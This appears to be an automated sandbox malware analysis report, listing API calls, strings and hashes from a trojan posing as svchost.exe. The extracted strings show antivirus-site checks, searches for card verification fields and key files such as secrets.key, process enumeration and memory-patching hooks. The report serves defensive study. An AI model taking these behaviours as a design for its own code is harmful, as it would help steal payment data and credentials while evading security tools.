                                                                                                                                                                                                                • String ID: A1633F27a$C:\Windows\apppatch\svchost.exe$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$id=1&post=%u
                                                                                                                                                                                                                • API String ID: 2364452126-1117616434
                                                                                                                                                                                                                • Opcode ID: b9d8af1d4a9e1f12a50ada2ec39429a23b44ab9565feff73844357e272f200b6
                                                                                                                                                                                                                • Instruction ID: ea93b0697295e4a08669867db19145bb48732cd28e24a887d6f0900e20f8859c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d8af1d4a9e1f12a50ada2ec39429a23b44ab9565feff73844357e272f200b6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B519371A80305BBEB219BA4FC4EFEA3769EB48744F944454F60597380EBB4DD448BB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avast.com,?,?,02D2604F), ref: 02D25ECB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EDB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EEB
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25EF7
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25F03
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?,?,02D2604F), ref: 02D25F0F
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com,?), ref: 02D25F1B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky,?,avast.com), ref: 02D25F27
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb,?,kaspersky), ref: 02D25F33
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com,?,drweb), ref: 02D25F3F
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir,?,eset.com), ref: 02D25F4B
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira,?,antivir), ref: 02D25F57
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,.comodo.com,?,anti-malware,?,trendsecure,?,kltest.org.ru,?,z-oleg.com,?,virusinfo,?,virustotal,?,avira), ref: 02D25F63
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$kltest.org.ru$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                                • API String ID: 0-3008981035
                                                                                                                                                                                                                • Opcode ID: 8abbebf26cf268469bd33470e59e14e2d65aee8190b687f32ef581c0b5170c4f
                                                                                                                                                                                                                • Instruction ID: 7d05a577b3efcb31d967a9912be885e6abe19d9dc09216d81f604d27b88fce4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8abbebf26cf268469bd33470e59e14e2d65aee8190b687f32ef581c0b5170c4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0116E52386B37327A1571697C59F6F424C8D61CCE3C90620F861F1385E785CD4F4AB9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?), ref: 00402EB0
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00402ED0
                                                                                                                                                                                                                • CoCreateInstance.OLE32(004043E8,00000000,00000001,004041D8,?), ref: 00402EF7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F0F
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F2A
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F48
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00402F66
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FEC
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FF2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FF8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00402FFE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(.5@), ref: 0040303D
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F3C), ref: 004031E6
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0040320B
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403229
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00403011,00404F28), ref: 00402DC8
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: HeapAlloc.KERNEL32(00000000,?,00403011,00404F28), ref: 00402DCF
                                                                                                                                                                                                                  • Part of subcall function 00402DC0: SysAllocString.OLEAUT32(00403011), ref: 00402DF0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032D6
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032DC
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004032E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: .5@$.5@$cmd.exe$p=<u
                                                                                                                                                                                                                • API String ID: 2839743307-1930425439
                                                                                                                                                                                                                • Opcode ID: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
                                                                                                                                                                                                                • Instruction ID: 7356d6b497d974f43c465eb486c8ab872bac2c341a44699d5e6db9722a73acc6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e3b16be614db6c6fd603cea34a01d53bce829db1e78b23bd4969b6f42b954d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65F1EA75E102199FCB00DFA8C884A9EBBB9FF88710F15816AE914BB391D774AD41CF94
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D39E76
                                                                                                                                                                                                                • GetThreadPriority.KERNEL32(00000000,?,02D3A160,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D39E7D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02D39E86
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02D3A160,00000008,00000040,?,?,02D3A160,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D39EA7
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02D39EC6
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02D39EE2
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02D39EF8
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02D39F06
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D39F11
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02D39F24
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02D39F35
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02D39F44
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02D39F53
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02D39F62
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000006,?), ref: 02D39F6A
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02D39F7D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02D39F8E
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02D39F9D
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02D39FA9
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02D39FB3
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D39FBB
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02D39FC2
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02D39FFE
                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000), ref: 02D3A005
                                                                                                                                                                                                                • VirtualProtect.KERNEL32(02D3A160,00000008,00000000,02D3A160), ref: 02D3A01F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2984368831-0
                                                                                                                                                                                                                • Opcode ID: 1015ab2619526b394a713de296e82c23d0f0a9ea9962f3fa32112651f0e283b3
                                                                                                                                                                                                                • Instruction ID: bd680d3785d96763ba1e66baa25dbcf16c78b3f0fc1d6c6e6de3d80c9610c12a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1015ab2619526b394a713de296e82c23d0f0a9ea9962f3fa32112651f0e283b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5516171940219EFD710AF74DC49BAE77ACFF49310F158928F986E7280DA789D91CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(02D2135E,\java\,?,75B05180,00000000,?,?,02D2135E,?,?), ref: 02D3FA5D
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(02D2135E,\windows\,?,?,02D2135E,?,?), ref: 02D3FA6D
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02D2135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D2135E,?,?), ref: 02D3FA82
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,?,?,02D2135E,?,?), ref: 02D3FA9E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FAA5
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3FAB5
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,02D2135E,000000FF,00000000,00000000,00000000,00000000,?,?,02D2135E,?,?), ref: 02D3FAD1
                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02D3FAEA
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,?,?,02D2135E,?,?), ref: 02D3FB0B
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,02D2135E,?,?), ref: 02D3FB32
                                                                                                                                                                                                                • LockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D2135E,?,?), ref: 02D3FB42
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,02D2135E,?,?), ref: 02D3FB57
                                                                                                                                                                                                                • UnlockFile.KERNEL32(?,00000000,00000000,00000004,00000000,?,?,02D2135E,?,?), ref: 02D3FB67
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75B05180,00000000,?,?,02D2135E,?,?), ref: 02D3FBC3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,02D2135E,?,?), ref: 02D3FBDA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FBDD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,02D2135E,?,?), ref: 02D3FBEE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,02D2135E,?,?), ref: 02D3FBF1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$ByteCharMultiPointerWide$AllocFreeLockNamePathReadShortSizeUnlockValidatememset
                                                                                                                                                                                                                • String ID: \java\$\windows\$iBKS
                                                                                                                                                                                                                • API String ID: 3399125490-2513530025
                                                                                                                                                                                                                • Opcode ID: 993a20b09fa555927472c35180be4ffd2e1dfb1658ac2ac8201af103afd598be
                                                                                                                                                                                                                • Instruction ID: ab50cc08faca15b1015cb276bf2fd939298d905ce5791b0b8291dfa4ae3acb2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 993a20b09fa555927472c35180be4ffd2e1dfb1658ac2ac8201af103afd598be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB51ACB2A45315AFE7218B26DC58FAB7BACEF44B64F544918F944DA380D7B0DC40CAB1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,74DEF380,00000000,00000001,00000000,?,?,?,02D384F4,?,?,?,?,?), ref: 02D3DF33
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF41
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF4D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF5B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF67
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02D384F4,?,?,?,?,?,?), ref: 02D3DF79
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D3DF8F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D3DFA2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02D3E00B
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02D3E012
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D3E022
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3E080,00000000,00000000,00000000), ref: 02D3E048
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D3E060
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D3E071
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                                • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                                • API String ID: 1632825432-2817208116
                                                                                                                                                                                                                • Opcode ID: 588ab4a2bf43488833a334e4a94df61e7dc74a57a66fc9ca581661ac57fe6e67
                                                                                                                                                                                                                • Instruction ID: 37d4f6b77888ce9da177eb437f61be919d5acbd103bc630710d2d6e70a5c5a2d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 588ab4a2bf43488833a334e4a94df61e7dc74a57a66fc9ca581661ac57fe6e67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5641F4316857612BE3230638EC5DFBA279A8F46B85F7C4250EC80E7381DB75DE09C6A4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02D2148C,00000000,?), ref: 02D2101B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,74DEF570,?,02D2148C,00000000,?), ref: 02D2103E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21045
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D21055
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,74DEF570,?,02D2148C,00000000,?), ref: 02D21073
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02D2148C,00000000,?), ref: 02D21093
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D40320,00000000,00000000,00000000), ref: 02D210B9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02D2148C,00000000,?), ref: 02D210D5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41CE0,00000000,00000000,00000000), ref: 02D210E5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,sign.key,?,02D2148C,00000000,?), ref: 02D210FD
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D427C0,00000000,00000000,00000000), ref: 02D21116
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,02D2148C,00000000,?), ref: 02D2112A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D2113B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D21150
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21153
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D2115F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D21162
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                                • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                                • API String ID: 3254303593-2345338882
                                                                                                                                                                                                                • Opcode ID: c1c363e535b3cb3e7c4fe3c3e5e1bf0084408fbebec15073ec4f0ae694e5b09d
                                                                                                                                                                                                                • Instruction ID: fe7dccb6c2f2b2e56a2683bdd149eb456201774b625ce24da795cc30a38ed53d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1c363e535b3cb3e7c4fe3c3e5e1bf0084408fbebec15073ec4f0ae694e5b09d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C41E4315402B17B97325A66AC8CEAF3B6CDED7F68B148518F919A2341DB31CD49CAB0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D242C3
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D242CE
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02D242F1
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D2430D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D24327
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02D24360
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D24367
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2437B
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?,?,00000000,?), ref: 02D243AC
                                                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,?,00000000,?), ref: 02D243C3
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D2442C
                                                                                                                                                                                                                • Process32Next.KERNEL32(?,?), ref: 02D2443B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleHeapProcessProcess32memset$AllocCloseCreateFileFirstInformationModuleNameNextOpenSnapshotToolhelp32_snprintf
                                                                                                                                                                                                                • String ID: %d%s$[System Process]$taskmgr{PIDProcess name
                                                                                                                                                                                                                • API String ID: 3808533164-4214784430
                                                                                                                                                                                                                • Opcode ID: 2dd96ee65653f91e8bf5a69026c2ffa2e83e693d7296ae4c1d4c7d9f28e99617
                                                                                                                                                                                                                • Instruction ID: 3d40491ec747cf1332670ac0987185983517ab13c60569ba8c642991974c34ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd96ee65653f91e8bf5a69026c2ffa2e83e693d7296ae4c1d4c7d9f28e99617
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10612571904351AFC710CF64E898AABBBE9EF95358F448968F88587340E771DC0DCBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40BB0
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40BF1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,75BFBF00), ref: 02D40BFB
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D40C03
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D40C14
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02D40C1B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02D40C5A
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,75BFBF00), ref: 02D40C67
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02D40CB0
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,75BFBF00), ref: 02D40CCC
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02D40CE9
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75B0A250,?,02D338A8,?), ref: 02D492E3
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D492E6
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: memset.MSVCRT ref: 02D492FB
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: CreateFileA.KERNEL32(02D338A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D338A8,?), ref: 02D49352
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49375
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: HeapValidate.KERNEL32(00000000,?,02D338A8,?), ref: 02D49378
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49384
                                                                                                                                                                                                                  • Part of subcall function 02D492D0: HeapFree.KERNEL32(00000000,?,02D338A8,?), ref: 02D49387
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,75BFBF00), ref: 02D40D18
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40D37
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40D9B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,75BFBF00), ref: 02D40DA8
                                                                                                                                                                                                                  • Part of subcall function 02D49460: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75B0A250), ref: 02D494E1
                                                                                                                                                                                                                  • Part of subcall function 02D49460: _snprintf.MSVCRT ref: 02D494FD
                                                                                                                                                                                                                  • Part of subcall function 02D49460: FindFirstFileA.KERNEL32(00000000,?), ref: 02D4950C
                                                                                                                                                                                                                  • Part of subcall function 02D49460: LocalFree.KERNEL32(00000000), ref: 02D49519
                                                                                                                                                                                                                  • Part of subcall function 02D49460: wsprintfA.USER32 ref: 02D49558
                                                                                                                                                                                                                  • Part of subcall function 02D49460: wsprintfA.USER32 ref: 02D49566
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
